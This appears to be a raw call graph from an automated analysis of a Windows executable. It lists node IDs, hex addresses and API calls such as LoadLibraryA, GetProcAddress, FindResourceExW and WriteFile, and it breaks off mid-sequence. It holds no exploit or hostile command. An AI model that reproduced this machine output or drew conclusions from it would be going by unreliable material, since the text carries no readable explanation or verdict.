93663->94852 93666 4259ef TranslateMessage DispatchMessageW GetMessageW 93665->93666 93666->93666 93667 425a1f 93666->93667 93667->93654 93668 3bebf7 timeGetTime 93668->93709 93669 3bed21 PeekMessageW 93669->93709 93670 3b6eed 48 API calls 93670->93709 93672 3cf4ea 48 API calls 93672->93709 93673 425557 WaitForSingleObject 93675 425574 GetExitCodeProcess CloseHandle 93673->93675 93673->93709 93674 3bd7f7 48 API calls 93704 425429 Mailbox 93674->93704 93675->93709 93676 42588f Sleep 93676->93704 93677 3bed3a TranslateMessage DispatchMessageW 93677->93669 93678 3bedae timeGetTime 94854 3b1caa 49 API calls 93678->94854 93680 3cdc38 timeGetTime 93680->93704 93682 425733 Sleep 93682->93704 93685 425926 GetExitCodeProcess 93687 425952 CloseHandle 93685->93687 93688 42593c WaitForSingleObject 93685->93688 93686 425445 Sleep 93686->93709 93687->93704 93688->93687 93688->93709 93689 425432 Sleep 93689->93686 93690 418c4b 108 API calls 93690->93704 93691 3b2c79 107 API calls 93691->93704 93693 4259ae Sleep 93693->93709 93694 3b1caa 49 API calls 93694->93709 93697 3bce19 48 API calls 93697->93704 93700 3bd6e9 55 API calls 93700->93704 93704->93674 93704->93680 93704->93685 93704->93686 93704->93689 93704->93690 93704->93691 93704->93693 93704->93697 93704->93700 93704->93709 94856 3f4cbe 49 API calls Mailbox 93704->94856 94857 3b1caa 49 API calls 93704->94857 94858 3b2aae 331 API calls 93704->94858 94888 40ccb2 50 API calls 93704->94888 94889 3f7a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93704->94889 94890 3f6532 63 API calls 3 library calls 93704->94890 93706 3bd6e9 55 API calls 93706->93709 93707 3fcc5c 86 API calls 93707->93709 93708 3bce19 48 API calls 93708->93709 93709->93657 93709->93659 93709->93663 93709->93668 93709->93669 93709->93670 93709->93672 93709->93673 93709->93676 93709->93677 93709->93678 93709->93682 93709->93686 93709->93694 93709->93704 93709->93706 93709->93707 93709->93708 93710 3b2aae 307 API calls 93709->93710 94765 3bf110 93709->94765 94830 3c45e0 93709->94830 94846 3beed0 331 API calls Mailbox 93709->94846 94847 3bef00 86 API calls 93709->94847 94848 3c3200 331 API calls 2 library calls 93709->94848 94849 3ce244 TranslateAcceleratorW 93709->94849 94850 3cdc5f IsDialogMessageW GetClassLongW 93709->94850 94855 418d23 48 API calls 93709->94855 94859 3bfe30 93709->94859 93710->93709 93711->93463 93712->93470 93713->93482 93715 3df8a0 __ftell_nolock 93714->93715 93716 3b5381 GetModuleFileNameW 93715->93716 93717 3bce19 48 API calls 93716->93717 93718 3b53a7 93717->93718 93719 3b660f 49 API calls 93718->93719 93720 3b53b1 Mailbox 93719->93720 93720->93490 93722 3bce28 __NMSG_WRITE 93721->93722 93723 3cee75 48 API calls 93722->93723 93724 3bce50 ___crtGetEnvironmentStringsW 93723->93724 93725 3cf4ea 48 API calls 93724->93725 93726 3bce66 93725->93726 93726->93494 93728 3b5197 93727->93728 93729 3b519f 93728->93729 93730 421ace 93728->93730 95132 3b5130 93729->95132 93731 3b6b4a 48 API calls 93730->93731 93734 421adb __NMSG_WRITE 93731->93734 93733 3b51aa 93737 3b510d 93733->93737 93735 3cee75 48 API calls 93734->93735 93736 421b07 ___crtGetEnvironmentStringsW 93735->93736 93738 3b511f 93737->93738 93739 421be7 93737->93739 95142 3bb384 93738->95142 95151 3ea58f 48 API calls ___crtGetEnvironmentStringsW 93739->95151 93742 3b512b 93742->93506 93743 421bf1 93744 3b6eed 48 API calls 93743->93744 93745 421bf9 Mailbox 93744->93745 93749 3cf4f2 __calloc_impl 93746->93749 93748 3cf50c 93748->93512 93749->93748 93750 3cf50e std::exception::exception 93749->93750 93755 3d395c 93749->93755 93769 3d6805 RaiseException 93750->93769 93752 3cf538 93770 3d673b 47 API calls _free 93752->93770 93754 3cf54a 93754->93512 93756 3d39d7 __calloc_impl 93755->93756 93759 3d3968 __calloc_impl 93755->93759 93776 3d7c0e 47 API calls __getptd_noexit 93756->93776 93757 3d3973 93757->93759 93771 3d81c2 47 API calls __NMSG_WRITE 93757->93771 93772 3d821f 47 API calls 5 library calls 93757->93772 93773 3d1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93757->93773 93759->93757 93761 3d399b RtlAllocateHeap 93759->93761 93764 3d39c3 93759->93764 93767 3d39c1 93759->93767 93761->93759 93762 3d39cf 93761->93762 93762->93749 93774 3d7c0e 47 API calls __getptd_noexit 93764->93774 93775 3d7c0e 47 API calls __getptd_noexit 93767->93775 93769->93752 93770->93754 93771->93757 93772->93757 93774->93767 93775->93762 93776->93762 93778 3bd7f7 48 API calls 93777->93778 93779 3b61db 93778->93779 93780 3b6009 93779->93780 93781 3b6016 __ftell_nolock 93780->93781 93782 3b6a63 48 API calls 93781->93782 93788 3b617c Mailbox 93781->93788 93784 3b6048 93782->93784 93792 3b607e Mailbox 93784->93792 93871 3b61a6 93784->93871 93785 3b61a6 48 API calls 93785->93792 93786 3b614f 93787 3bce19 48 API calls 93786->93787 93786->93788 93790 3b6170 93787->93790 93788->93519 93789 3bce19 48 API calls 93789->93792 93791 3b64cf 48 API calls 93790->93791 93791->93788 93792->93785 93792->93786 93792->93788 93792->93789 93874 3b64cf 93792->93874 93897 3b41a9 93794->93897 93797 3b3a06 93797->93525 93800 422ff0 93801 3d1c9d _free 47 API calls 93800->93801 93803 422ffd 93801->93803 93804 3b4252 84 API calls 93803->93804 93805 423006 93804->93805 93805->93805 93807 3b6ef8 93806->93807 93808 3b622b 93806->93808 94413 3bdd47 48 API calls ___crtGetEnvironmentStringsW 93807->94413 93810 3b9048 93808->93810 93811 3cf4ea 48 API calls 93810->93811 93812 3b6237 93811->93812 93812->93530 93814 3bd6f4 93813->93814 93815 3bd71b 93814->93815 94414 3bd764 55 API calls 93814->94414 93815->93533 93818 3bd654 93817->93818 93825 3bd67e 93817->93825 93819 3bd65b 93818->93819 93821 3bd6c2 93818->93821 93820 3bd666 93819->93820 93826 3bd6ab 93819->93826 94415 3bd9a0 53 API calls __cinit 93820->94415 93821->93826 94417 3cdce0 53 API calls 93821->94417 93825->93541 93826->93825 94416 3cdce0 53 API calls 93826->94416 93828 3b641f 93827->93828 93829 3b6406 93827->93829 93830 3b6a63 48 API calls 93828->93830 93831 3b6eed 48 API calls 93829->93831 93832 3b62d1 93830->93832 93831->93832 93833 3d0fa7 93832->93833 93834 3d1028 93833->93834 93835 3d0fb3 93833->93835 94420 3d103a 59 API calls 4 library calls 93834->94420 93839 3d0fd8 93835->93839 94418 3d7c0e 47 API calls __getptd_noexit 93835->94418 93838 3d1035 93838->93547 93839->93547 93840 3d0fbf 94419 3d6e10 8 API calls __woutput_l 93840->94419 93842 3d0fca 93842->93547 93844 3cc064 93843->93844 93846 3cc069 Mailbox 93843->93846 94421 3cc1af 48 API calls 93844->94421 93852 3cc077 93846->93852 94422 3cc15c 48 API calls 93846->94422 93848 3cf4ea 48 API calls 93850 3cc108 93848->93850 93849 3cc152 93849->93578 93851 3cf4ea 48 API calls 93850->93851 93853 3cc113 93851->93853 93852->93848 93852->93849 93853->93578 93853->93853 93855 3c1cf6 93854->93855 93856 3c1ba2 93854->93856 93855->93586 93858 3cf4ea 48 API calls 93856->93858 93869 3c1bae 93856->93869 93859 4249c4 93858->93859 93860 3cf4ea 48 API calls 93859->93860 93863 4249cf 93860->93863 93861 3c1c5d 93861->93586 93862 3cf4ea 48 API calls 93865 3c1c9f 93862->93865 93868 3cf4ea 48 API calls 93863->93868 93863->93869 93864 3c1bb9 93864->93861 93864->93862 93866 3c1cb2 93865->93866 94423 3b2925 48 API calls 93865->94423 93866->93586 93868->93863 93869->93864 94424 3cc15c 48 API calls 93869->94424 93870->93586 93880 3bbdfa 93871->93880 93873 3b61b1 93873->93784 93875 3b651b 93874->93875 93879 3b64dd ___crtGetEnvironmentStringsW 93874->93879 93878 3cf4ea 48 API calls 93875->93878 93876 3cf4ea 48 API calls 93877 3b64e4 93876->93877 93877->93792 93878->93879 93879->93876 93881 3bbe0d 93880->93881 93885 3bbe0a ___crtGetEnvironmentStringsW 93880->93885 93882 3cf4ea 48 API calls 93881->93882 93883 3bbe17 93882->93883 93886 3cee75 93883->93886 93885->93873 93888 3cf4ea __calloc_impl 93886->93888 93887 3d395c __crtCompareStringA_stat 47 API calls 93887->93888 93888->93887 93889 3cf50c 93888->93889 93890 3cf50e std::exception::exception 93888->93890 93889->93885 93895 3d6805 RaiseException 93890->93895 93892 3cf538 93896 3d673b 47 API calls _free 93892->93896 93894 3cf54a 93894->93885 93895->93892 93896->93894 93962 3b4214 93897->93962 93902 424f73 93905 3b4252 84 API calls 93902->93905 93903 3b41d4 LoadLibraryExW 93972 3b4291 93903->93972 93907 424f7a 93905->93907 93909 3b4291 3 API calls 93907->93909 93911 424f82 93909->93911 93910 3b41fb 93910->93911 93912 3b4207 93910->93912 93998 3b44ed 93911->93998 93914 3b4252 84 API calls 93912->93914 93916 3b39fe 93914->93916 93916->93797 93921 3fc396 93916->93921 93918 424fa9 94006 3b4950 93918->94006 93920 424fb6 93922 3b4517 83 API calls 93921->93922 93923 3fc405 93922->93923 94187 3fc56d 93923->94187 93926 3b44ed 64 API calls 93927 3fc432 93926->93927 93928 3b44ed 64 API calls 93927->93928 93929 3fc442 93928->93929 93930 3b44ed 64 API calls 93929->93930 93931 3fc45d 93930->93931 93932 3b44ed 64 API calls 93931->93932 93933 3fc478 93932->93933 93934 3b4517 83 API calls 93933->93934 93935 3fc48f 93934->93935 93936 3d395c __crtCompareStringA_stat 47 API calls 93935->93936 93937 3fc496 93936->93937 93938 3d395c __crtCompareStringA_stat 47 API calls 93937->93938 93939 3fc4a0 93938->93939 93940 3b44ed 64 API calls 93939->93940 93941 3fc4b4 93940->93941 93942 3fbf5a GetSystemTimeAsFileTime 93941->93942 93943 3fc4c7 93942->93943 93944 3fc4dc 93943->93944 93945 3fc4f1 93943->93945 93946 3d1c9d _free 47 API calls 93944->93946 93947 3fc4f7 93945->93947 93948 3fc556 93945->93948 93949 3fc4e2 93946->93949 94193 3fb965 118 API calls __fcloseall 93947->94193 93951 3d1c9d _free 47 API calls 93948->93951 93952 3d1c9d _free 47 API calls 93949->93952 93954 3fc41b 93951->93954 93952->93954 93953 3fc54e 93955 3d1c9d _free 47 API calls 93953->93955 93954->93800 93956 3b4252 93954->93956 93955->93954 93957 3b425c 93956->93957 93958 3b4263 93956->93958 94194 3d35e4 93957->94194 93960 3b4283 FreeLibrary 93958->93960 93961 3b4272 93958->93961 93960->93961 93961->93800 94011 3b4339 93962->94011 93964 3b423c 93966 3b41bb 93964->93966 93967 3b4244 FreeLibrary 93964->93967 93969 3d3499 93966->93969 93967->93966 94019 3d34ae 93969->94019 93971 3b41c8 93971->93902 93971->93903 94098 3b42e4 93972->94098 93975 3b42b8 93977 3b41ec 93975->93977 93978 3b42c1 FreeLibrary 93975->93978 93979 3b4380 93977->93979 93978->93977 93980 3cf4ea 48 API calls 93979->93980 93981 3b4395 93980->93981 94106 3b47b7 93981->94106 93983 3b43a1 ___crtGetEnvironmentStringsW 93984 3b43dc 93983->93984 93986 3b4499 93983->93986 93987 3b44d1 93983->93987 93985 3b4950 57 API calls 93984->93985 93995 3b43e5 93985->93995 94109 3b406b CreateStreamOnHGlobal 93986->94109 94120 3fc750 93 API calls 93987->94120 93990 3b44ed 64 API calls 93990->93995 93992 3b4479 93992->93910 93993 424ed7 93994 3b4517 83 API calls 93993->93994 93996 424eeb 93994->93996 93995->93990 93995->93992 93995->93993 94115 3b4517 93995->94115 93997 3b44ed 64 API calls 93996->93997 93997->93992 93999 3b44ff 93998->93999 94001 424fc0 93998->94001 94144 3d381e 93999->94144 94003 3fbf5a 94164 3fbdb4 94003->94164 94005 3fbf70 94005->93918 94007 3b495f 94006->94007 94010 425002 94006->94010 94169 3d3e65 94007->94169 94009 3b4967 94009->93920 94015 3b434b 94011->94015 94014 3b4321 LoadLibraryA GetProcAddress 94014->93964 94016 3b422f 94015->94016 94017 3b4354 LoadLibraryA 94015->94017 94016->93964 94016->94014 94017->94016 94018 3b4365 GetProcAddress 94017->94018 94018->94016 94022 3d34ba __mtinitlocknum 94019->94022 94020 3d34cd 94067 3d7c0e 47 API calls __getptd_noexit 94020->94067 94022->94020 94024 3d34fe 94022->94024 94023 3d34d2 94068 3d6e10 8 API calls __woutput_l 94023->94068 94038 3de4c8 94024->94038 94027 3d3503 94028 3d350c 94027->94028 94029 3d3519 94027->94029 94069 3d7c0e 47 API calls __getptd_noexit 94028->94069 94031 3d3543 94029->94031 94032 3d3523 94029->94032 94052 3de5e0 94031->94052 94070 3d7c0e 47 API calls __getptd_noexit 94032->94070 94034 3d34dd __mtinitlocknum @_EH4_CallFilterFunc@8 94034->93971 94039 3de4d4 __mtinitlocknum 94038->94039 94040 3d7cf4 __lock 47 API calls 94039->94040 94050 3de4e2 94040->94050 94041 3de559 94077 3d69d0 47 API calls __crtCompareStringA_stat 94041->94077 94042 3de552 94072 3de5d7 94042->94072 94045 3de5cc __mtinitlocknum 94045->94027 94046 3de560 94046->94042 94047 3de56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94046->94047 94047->94042 94048 3d7d7c __mtinitlocknum 47 API calls 94048->94050 94050->94041 94050->94042 94050->94048 94075 3d4e5b 48 API calls __lock 94050->94075 94076 3d4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94050->94076 94061 3de600 __wopenfile 94052->94061 94053 3de61a 94082 3d7c0e 47 API calls __getptd_noexit 94053->94082 94055 3de7d5 94055->94053 94059 3de838 94055->94059 94056 3de61f 94083 3d6e10 8 API calls __woutput_l 94056->94083 94058 3d354e 94071 3d3570 LeaveCriticalSection LeaveCriticalSection _fseek 94058->94071 94079 3e63c9 94059->94079 94061->94053 94061->94055 94061->94061 94084 3d185b 59 API calls 3 library calls 94061->94084 94063 3de7ce 94063->94055 94085 3d185b 59 API calls 3 library calls 94063->94085 94065 3de7ed 94065->94055 94086 3d185b 59 API calls 3 library calls 94065->94086 94067->94023 94068->94034 94069->94034 94070->94034 94071->94034 94078 3d7e58 LeaveCriticalSection 94072->94078 94074 3de5de 94074->94045 94075->94050 94076->94050 94077->94046 94078->94074 94087 3e5bb1 94079->94087 94081 3e63e2 94081->94058 94082->94056 94083->94058 94084->94063 94085->94065 94086->94055 94089 3e5bbd __mtinitlocknum 94087->94089 94088 3e5bcf 94090 3d7c0e _free 47 API calls 94088->94090 94089->94088 94091 3e5c06 94089->94091 94092 3e5bd4 94090->94092 94094 3e5c78 __wsopen_helper 110 API calls 94091->94094 94093 3d6e10 __woutput_l 8 API calls 94092->94093 94097 3e5bde __mtinitlocknum 94093->94097 94095 3e5c23 94094->94095 94096 3e5c4c __wsopen_helper LeaveCriticalSection 94095->94096 94096->94097 94097->94081 94102 3b42f6 94098->94102 94101 3b42cc LoadLibraryA GetProcAddress 94101->93975 94103 3b42aa 94102->94103 94104 3b42ff LoadLibraryA 94102->94104 94103->93975 94103->94101 94104->94103 94105 3b4310 GetProcAddress 94104->94105 94105->94103 94107 3cf4ea 48 API calls 94106->94107 94108 3b47c9 94107->94108 94108->93983 94110 3b40a2 94109->94110 94111 3b4085 FindResourceExW 94109->94111 94110->93984 94111->94110 94112 424f16 LoadResource 94111->94112 94112->94110 94113 424f2b SizeofResource 94112->94113 94113->94110 94114 424f3f LockResource 94113->94114 94114->94110 94116 424fe0 94115->94116 94117 3b4526 94115->94117 94121 3d3a8d 94117->94121 94119 3b4534 94119->93995 94120->93984 94124 3d3a99 __mtinitlocknum 94121->94124 94122 3d3aa7 94134 3d7c0e 47 API calls __getptd_noexit 94122->94134 94123 3d3acd 94136 3d4e1c 94123->94136 94124->94122 94124->94123 94127 3d3aac 94135 3d6e10 8 API calls __woutput_l 94127->94135 94129 3d3ad3 94142 3d39fe 81 API calls 4 library calls 94129->94142 94131 3d3ae2 94143 3d3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94131->94143 94133 3d3ab7 __mtinitlocknum 94133->94119 94134->94127 94135->94133 94137 3d4e2c 94136->94137 94138 3d4e4e EnterCriticalSection 94136->94138 94137->94138 94139 3d4e34 94137->94139 94140 3d4e44 94138->94140 94141 3d7cf4 __lock 47 API calls 94139->94141 94140->94129 94141->94140 94142->94131 94143->94133 94147 3d3839 94144->94147 94146 3b4510 94146->94003 94148 3d3845 __mtinitlocknum 94147->94148 94149 3d3888 94148->94149 94150 3d385b _memset 94148->94150 94151 3d3880 __mtinitlocknum 94148->94151 94152 3d4e1c __lock_file 48 API calls 94149->94152 94160 3d7c0e 47 API calls __getptd_noexit 94150->94160 94151->94146 94154 3d388e 94152->94154 94162 3d365b 62 API calls 6 library calls 94154->94162 94156 3d3875 94161 3d6e10 8 API calls __woutput_l 94156->94161 94157 3d38a4 94163 3d38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94157->94163 94160->94156 94161->94151 94162->94157 94163->94151 94167 3d344a GetSystemTimeAsFileTime 94164->94167 94166 3fbdc3 94166->94005 94168 3d3478 __aulldiv 94167->94168 94168->94166 94170 3d3e71 __mtinitlocknum 94169->94170 94171 3d3e7f 94170->94171 94172 3d3e94 94170->94172 94183 3d7c0e 47 API calls __getptd_noexit 94171->94183 94174 3d4e1c __lock_file 48 API calls 94172->94174 94176 3d3e9a 94174->94176 94175 3d3e84 94184 3d6e10 8 API calls __woutput_l 94175->94184 94185 3d3b0c 55 API calls 6 library calls 94176->94185 94179 3d3ea5 94186 3d3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94179->94186 94181 3d3eb7 94182 3d3e8f __mtinitlocknum 94181->94182 94182->94009 94183->94175 94184->94182 94185->94179 94186->94181 94192 3fc581 __tzset_nolock _wcscmp 94187->94192 94188 3b44ed 64 API calls 94188->94192 94189 3fc417 94189->93926 94189->93954 94190 3fbf5a GetSystemTimeAsFileTime 94190->94192 94191 3b4517 83 API calls 94191->94192 94192->94188 94192->94189 94192->94190 94192->94191 94193->93953 94195 3d35f0 __mtinitlocknum 94194->94195 94196 3d361c 94195->94196 94197 3d3604 94195->94197 94199 3d4e1c __lock_file 48 API calls 94196->94199 94204 3d3614 __mtinitlocknum 94196->94204 94223 3d7c0e 47 API calls __getptd_noexit 94197->94223 94201 3d362e 94199->94201 94200 3d3609 94224 3d6e10 8 API calls __woutput_l 94200->94224 94207 3d3578 94201->94207 94204->93958 94208 3d359b 94207->94208 94209 3d3587 94207->94209 94211 3d3597 94208->94211 94226 3d2c84 94208->94226 94266 3d7c0e 47 API calls __getptd_noexit 94209->94266 94225 3d3653 LeaveCriticalSection LeaveCriticalSection _fseek 94211->94225 94212 3d358c 94267 3d6e10 8 API calls __woutput_l 94212->94267 94219 3d35b5 94243 3de9d2 94219->94243 94221 3d35bb 94221->94211 94222 3d1c9d _free 47 API calls 94221->94222 94222->94211 94223->94200 94224->94204 94225->94204 94227 3d2c97 94226->94227 94231 3d2cbb 94226->94231 94228 3d2933 __flswbuf 47 API calls 94227->94228 94227->94231 94229 3d2cb4 94228->94229 94268 3daf61 94229->94268 94232 3deb36 94231->94232 94233 3d35af 94232->94233 94234 3deb43 94232->94234 94236 3d2933 94233->94236 94234->94233 94235 3d1c9d _free 47 API calls 94234->94235 94235->94233 94237 3d293d 94236->94237 94238 3d2952 94236->94238 94374 3d7c0e 47 API calls __getptd_noexit 94237->94374 94238->94219 94240 3d2942 94375 3d6e10 8 API calls __woutput_l 94240->94375 94242 3d294d 94242->94219 94244 3de9de __mtinitlocknum 94243->94244 94245 3de9e6 94244->94245 94248 3de9fe 94244->94248 94391 3d7bda 47 API calls __getptd_noexit 94245->94391 94247 3dea7b 94395 3d7bda 47 API calls __getptd_noexit 94247->94395 94248->94247 94253 3dea28 94248->94253 94249 3de9eb 94392 3d7c0e 47 API calls __getptd_noexit 94249->94392 94252 3dea80 94396 3d7c0e 47 API calls __getptd_noexit 94252->94396 94255 3da8ed ___lock_fhandle 49 API calls 94253->94255 94257 3dea2e 94255->94257 94256 3dea88 94397 3d6e10 8 API calls __woutput_l 94256->94397 94258 3dea4c 94257->94258 94259 3dea41 94257->94259 94393 3d7c0e 47 API calls __getptd_noexit 94258->94393 94376 3dea9c 94259->94376 94261 3de9f3 __mtinitlocknum 94261->94221 94264 3dea47 94394 3dea73 LeaveCriticalSection __unlock_fhandle 94264->94394 94266->94212 94267->94211 94269 3daf6d __mtinitlocknum 94268->94269 94270 3daf75 94269->94270 94272 3daf8d 94269->94272 94366 3d7bda 47 API calls __getptd_noexit 94270->94366 94273 3db022 94272->94273 94277 3dafbf 94272->94277 94371 3d7bda 47 API calls __getptd_noexit 94273->94371 94274 3daf7a 94367 3d7c0e 47 API calls __getptd_noexit 94274->94367 94293 3da8ed 94277->94293 94278 3db027 94372 3d7c0e 47 API calls __getptd_noexit 94278->94372 94281 3dafc5 94283 3dafd8 94281->94283 94284 3dafeb 94281->94284 94282 3db02f 94373 3d6e10 8 API calls __woutput_l 94282->94373 94302 3db043 94283->94302 94368 3d7c0e 47 API calls __getptd_noexit 94284->94368 94287 3daf82 __mtinitlocknum 94287->94231 94289 3dafe4 94370 3db01a LeaveCriticalSection __unlock_fhandle 94289->94370 94290 3daff0 94369 3d7bda 47 API calls __getptd_noexit 94290->94369 94294 3da8f9 __mtinitlocknum 94293->94294 94295 3da946 EnterCriticalSection 94294->94295 94296 3d7cf4 __lock 47 API calls 94294->94296 94297 3da96c __mtinitlocknum 94295->94297 94298 3da91d 94296->94298 94297->94281 94299 3da928 InitializeCriticalSectionAndSpinCount 94298->94299 94300 3da93a 94298->94300 94299->94300 94301 3da970 ___lock_fhandle LeaveCriticalSection 94300->94301 94301->94295 94303 3db050 __ftell_nolock 94302->94303 94304 3db08d 94303->94304 94305 3db0ac 94303->94305 94333 3db082 94303->94333 94306 3d7bda __lseeki64 47 API calls 94304->94306 94309 3db105 94305->94309 94310 3db0e9 94305->94310 94308 3db092 94306->94308 94307 3da70c __crtCompareStringA_stat 6 API calls 94311 3db86b 94307->94311 94312 3d7c0e _free 47 API calls 94308->94312 94313 3db11c 94309->94313 94316 3df82f __lseeki64_nolock 49 API calls 94309->94316 94314 3d7bda __lseeki64 47 API calls 94310->94314 94311->94289 94315 3db099 94312->94315 94317 3e3bf2 __flswbuf 47 API calls 94313->94317 94318 3db0ee 94314->94318 94319 3d6e10 __woutput_l 8 API calls 94315->94319 94316->94313 94320 3db12a 94317->94320 94321 3d7c0e _free 47 API calls 94318->94321 94319->94333 94322 3db44b 94320->94322 94328 3d7a0d _LocaleUpdate::_LocaleUpdate 47 API calls 94320->94328 94323 3db0f5 94321->94323 94324 3db7b8 WriteFile 94322->94324 94325 3db463 94322->94325 94326 3d6e10 __woutput_l 8 API calls 94323->94326 94327 3db7e1 GetLastError 94324->94327 94335 3db410 94324->94335 94329 3db55a 94325->94329 94338 3db479 94325->94338 94326->94333 94327->94335 94330 3db150 GetConsoleMode 94328->94330 94340 3db663 94329->94340 94343 3db565 94329->94343 94330->94322 94332 3db189 94330->94332 94331 3db81b 94331->94333 94334 3d7c0e _free 47 API calls 94331->94334 94332->94322 94336 3db199 GetConsoleCP 94332->94336 94333->94307 94341 3db843 94334->94341 94335->94331 94335->94333 94342 3db7f7 94335->94342 94336->94335 94364 3db1c2 94336->94364 94337 3db4e9 WriteFile 94337->94327 94339 3db526 94337->94339 94338->94331 94338->94337 94339->94335 94339->94338 94349 3db555 94339->94349 94340->94331 94344 3db6d8 WideCharToMultiByte 94340->94344 94345 3d7bda __lseeki64 47 API calls 94341->94345 94346 3db7fe 94342->94346 94347 3db812 94342->94347 94343->94331 94348 3db5de WriteFile 94343->94348 94344->94327 94359 3db71f 94344->94359 94345->94333 94350 3d7c0e _free 47 API calls 94346->94350 94351 3d7bed __dosmaperr 47 API calls 94347->94351 94348->94327 94352 3db62d 94348->94352 94349->94335 94354 3db803 94350->94354 94351->94333 94352->94335 94352->94343 94352->94349 94353 3db727 WriteFile 94356 3db77a GetLastError 94353->94356 94353->94359 94357 3d7bda __lseeki64 47 API calls 94354->94357 94355 3d1688 __chsize_nolock 57 API calls 94355->94364 94356->94359 94357->94333 94358 3e40f7 59 API calls __chsize_nolock 94358->94364 94359->94335 94359->94340 94359->94349 94359->94353 94360 3db28f WideCharToMultiByte 94360->94335 94362 3db2ca WriteFile 94360->94362 94361 3db2f6 94361->94327 94361->94335 94363 3e5884 WriteConsoleW CreateFileW __chsize_nolock 94361->94363 94361->94364 94365 3db321 WriteFile 94361->94365 94362->94327 94362->94361 94363->94361 94364->94335 94364->94355 94364->94358 94364->94360 94364->94361 94365->94327 94365->94361 94366->94274 94367->94287 94368->94290 94369->94289 94370->94287 94371->94278 94372->94282 94373->94287 94374->94240 94375->94242 94398 3daba4 94376->94398 94378 3deb00 94411 3dab1e 48 API calls 2 library calls 94378->94411 94379 3deaaa 94379->94378 94381 3deade 94379->94381 94384 3daba4 __lseek_nolock 47 API calls 94379->94384 94381->94378 94382 3daba4 __lseek_nolock 47 API calls 94381->94382 94385 3deaea CloseHandle 94382->94385 94383 3deb08 94386 3deb2a 94383->94386 94412 3d7bed 47 API calls 2 library calls 94383->94412 94387 3dead5 94384->94387 94385->94378 94389 3deaf6 GetLastError 94385->94389 94386->94264 94388 3daba4 __lseek_nolock 47 API calls 94387->94388 94388->94381 94389->94378 94391->94249 94392->94261 94393->94264 94394->94261 94395->94252 94396->94256 94397->94261 94399 3dabaf 94398->94399 94400 3dabc4 94398->94400 94401 3d7bda __lseeki64 47 API calls 94399->94401 94402 3d7bda __lseeki64 47 API calls 94400->94402 94404 3dabe9 94400->94404 94403 3dabb4 94401->94403 94405 3dabf3 94402->94405 94406 3d7c0e _free 47 API calls 94403->94406 94404->94379 94407 3d7c0e _free 47 API calls 94405->94407 94408 3dabbc 94406->94408 94409 3dabfb 94407->94409 94408->94379 94410 3d6e10 __woutput_l 8 API calls 94409->94410 94410->94408 94411->94383 94412->94386 94413->93808 94414->93815 94415->93825 94416->93825 94417->93826 94418->93840 94419->93842 94420->93838 94421->93846 94422->93852 94423->93866 94424->93864 94484 3df8a0 94425->94484 94428 3b6a63 48 API calls 94429 3b6643 94428->94429 94486 3b6571 94429->94486 94432 3b40a7 94433 3df8a0 __ftell_nolock 94432->94433 94434 3b40b4 GetLongPathNameW 94433->94434 94435 3b6a63 48 API calls 94434->94435 94436 3b40dc 94435->94436 94437 3b49a0 94436->94437 94438 3bd7f7 48 API calls 94437->94438 94439 3b49b2 94438->94439 94440 3b660f 49 API calls 94439->94440 94441 3b49bd 94440->94441 94442 3b49c8 94441->94442 94445 422e35 94441->94445 94444 3b64cf 48 API calls 94442->94444 94446 3b49d4 94444->94446 94447 422e4f 94445->94447 94500 3cd35e 60 API calls 94445->94500 94494 3b28a6 94446->94494 94449 3b49e7 Mailbox 94449->93602 94451 3b41a9 136 API calls 94450->94451 94452 3b415e 94451->94452 94453 423489 94452->94453 94454 3b41a9 136 API calls 94452->94454 94455 3fc396 122 API calls 94453->94455 94456 3b4172 94454->94456 94457 42349e 94455->94457 94456->94453 94458 3b417a 94456->94458 94459 4234a2 94457->94459 94460 4234bf 94457->94460 94462 4234aa 94458->94462 94463 3b4186 94458->94463 94464 3b4252 84 API calls 94459->94464 94461 3cf4ea 48 API calls 94460->94461 94483 423504 Mailbox 94461->94483 94603 3f6b49 87 API calls _wprintf 94462->94603 94501 3bc833 94463->94501 94464->94462 94468 4234b8 94468->94460 94469 4236b4 94470 3d1c9d _free 47 API calls 94469->94470 94471 4236bc 94470->94471 94472 3b4252 84 API calls 94471->94472 94477 4236c5 94472->94477 94476 3d1c9d _free 47 API calls 94476->94477 94477->94476 94478 3b4252 84 API calls 94477->94478 94607 3f25b5 86 API calls 4 library calls 94477->94607 94478->94477 94480 3bce19 48 API calls 94480->94483 94483->94469 94483->94477 94483->94480 94589 3bba85 94483->94589 94597 3b4dd9 94483->94597 94604 3f2551 48 API calls ___crtGetEnvironmentStringsW 94483->94604 94605 3f2472 60 API calls 2 library calls 94483->94605 94606 3f9c12 48 API calls 94483->94606 94485 3b661c GetFullPathNameW 94484->94485 94485->94428 94487 3b657f 94486->94487 94490 3bb18b 94487->94490 94489 3b4114 94489->94432 94491 3bb199 94490->94491 94492 3bb1a2 ___crtGetEnvironmentStringsW 94490->94492 94491->94492 94493 3bbdfa 48 API calls 94491->94493 94492->94489 94493->94492 94495 3b28b8 94494->94495 94499 3b28d7 ___crtGetEnvironmentStringsW 94494->94499 94497 3cf4ea 48 API calls 94495->94497 94496 3cf4ea 48 API calls 94498 3b28ee 94496->94498 94497->94499 94498->94449 94499->94496 94500->94445 94502 3bc843 __ftell_nolock 94501->94502 94503 423095 94502->94503 94504 3bc860 94502->94504 94632 3f25b5 86 API calls 4 library calls 94503->94632 94613 3b48ba 49 API calls 94504->94613 94507 3bc882 94614 3b4550 56 API calls 94507->94614 94508 4230a8 94633 3f25b5 86 API calls 4 library calls 94508->94633 94510 3bc897 94510->94508 94511 3bc89f 94510->94511 94514 3bd7f7 48 API calls 94511->94514 94513 4230c4 94516 3bc90c 94513->94516 94515 3bc8ab 94514->94515 94615 3ce968 49 API calls __ftell_nolock 94515->94615 94518 3bc91a 94516->94518 94519 4230d7 94516->94519 94618 3d1dfc 94518->94618 94522 3b4907 CloseHandle 94519->94522 94520 3bc8b7 94523 3bd7f7 48 API calls 94520->94523 94524 4230e3 94522->94524 94525 3bc8c3 94523->94525 94526 3b41a9 136 API calls 94524->94526 94527 3b660f 49 API calls 94525->94527 94528 42310d 94526->94528 94529 3bc8d1 94527->94529 94531 423136 94528->94531 94534 3fc396 122 API calls 94528->94534 94616 3ceb66 SetFilePointerEx ReadFile 94529->94616 94530 3bc943 _wcscat _wcscpy 